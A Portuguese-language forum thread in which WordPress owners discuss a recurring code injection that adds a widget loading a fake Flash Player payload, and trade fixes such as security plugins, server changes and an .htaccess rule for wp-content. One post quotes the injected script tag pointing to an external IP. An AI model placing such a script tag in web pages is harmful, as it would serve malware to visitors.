Eae pessoal, tudo bem?
Acompanhei os comentários anteriores e percebi que todos chegam a deduções parecidas com as minhas, porém até um momento uma causa perdida.
Bom tenho o mesmo problema que Anderson e vi que faz 1 mês que ele deixo o ultimo recado. Alguma novidade?
Estou no modo manual, toda vez que o maldito widget adiciona uma linha para uma pagina .exe no meu index vou lá e excluo ele e a linha no código.
Ideias que estou trabalhando:
• Pesquisando algum pluging que bloqueia a adição de linhas ou dos próprios widgets automaticamente.
• Antivirus capaz de detectar o que acontece em meu WP.
• Códigos que adiciono ao index que possa impedir ou desconsiderar isso.
Mais ideias?
Pois é cara, fiz muita coisa, inclusive instalei plugins que monitoram o servidor e se um arquivo é criado, modificado, apagado, o plugin avisa.
Mas nem isto resolveu cara!
Baixei o tema todo novamente e mudei de servidor e parece que resolveu. Nunca mais voltou a “pegar virus”.
Pessoal, tenho o mesmo problema há vários meses.
Sempre elimino os scripts e sempre voltam depois de + ou – 10 dias…
Na maioria das vezes é criado um Widget com um código assim: <script src=”http://131.244.39.41/br/flashplayer”></script>
O que muda é só o IP em cada ataque. Eu estava com esse problema em um site, só que ontem começou em outro site.
O que resolveu foi com a instalação do WP-Sentinel, não tive mais problema com o SCRIPT, mas o WP-Sentinel sempre estava bloqueando o site então desinstalei.
Já fiz diversas coisas como: Mudar de tema {Original pago}, apagar plugins suspeitos, reinstalar completamente o WordPress.
Não sei mais o que fazer, estou pensando em mudar a pasta principal, exemplo: http://www.site.com.br/novo
Percebo que aparentemente é uma invasão externa, penso que algum servidor {programado} faz esse injeção do código malicioso.
Igual ocorria comigo.
A única solução foi a de trocar de servidor.
Antes ficava na locaweb. Agora está em server dedicado.
tente dar uma olhada no .htaccess do seu site via FTP
http://perishablepress.com/5g-blacklist-2013/
esse site acima ele eh um script para .htaccess para bloquear a entrada de alguns sites…
eu apliquei no meu site, as vezes ele pode funcionar…
faça um teste.
Pessoal,
Esse tipo de ataque (code injection) geralmente é feito através de vulnerabilidades em plugins e temas. São centenas de milhares de plugins criados e distribuidos por qualquer um e fica praticamente impossível acompanhar todas as formas de proteger o seu site WordPress, certo?
Bom, aqui vai um pequeno trecho de código que bloqueia o acesso direto a arquivos PHP dentro dos plugins e temas. Na prática, isso deveria ser prevenido pelo próprio plugin, usando funções que o WP disponibiliza para deixar o plugin mais seguro, mas, nem todos fazem.
Atenção, o código abaixo pode fazer com que algum plugin tenha alguma função bloqueada, caso ele utilize acesso direto aos arquivos PHP pelo usuário. Ao identificar algo assim, substitua o plugin por outro com a mesma funcionalidade.
O código abaixo deve ser colocado num arquivo .htaccess dentro da pasta wp-content:
## REMOVE ACCESS TO NO-ASSETS FILES
order deny,allow
deny from all
<files ~ ".(xml|css|jpe?g|png|gif|js)$">
allow from all
</files>
Caso tenham interesse, eu ofereço pacotes de limpeza e segurança para WordPress. Basta entrar em contato [at] tecnocracia.net.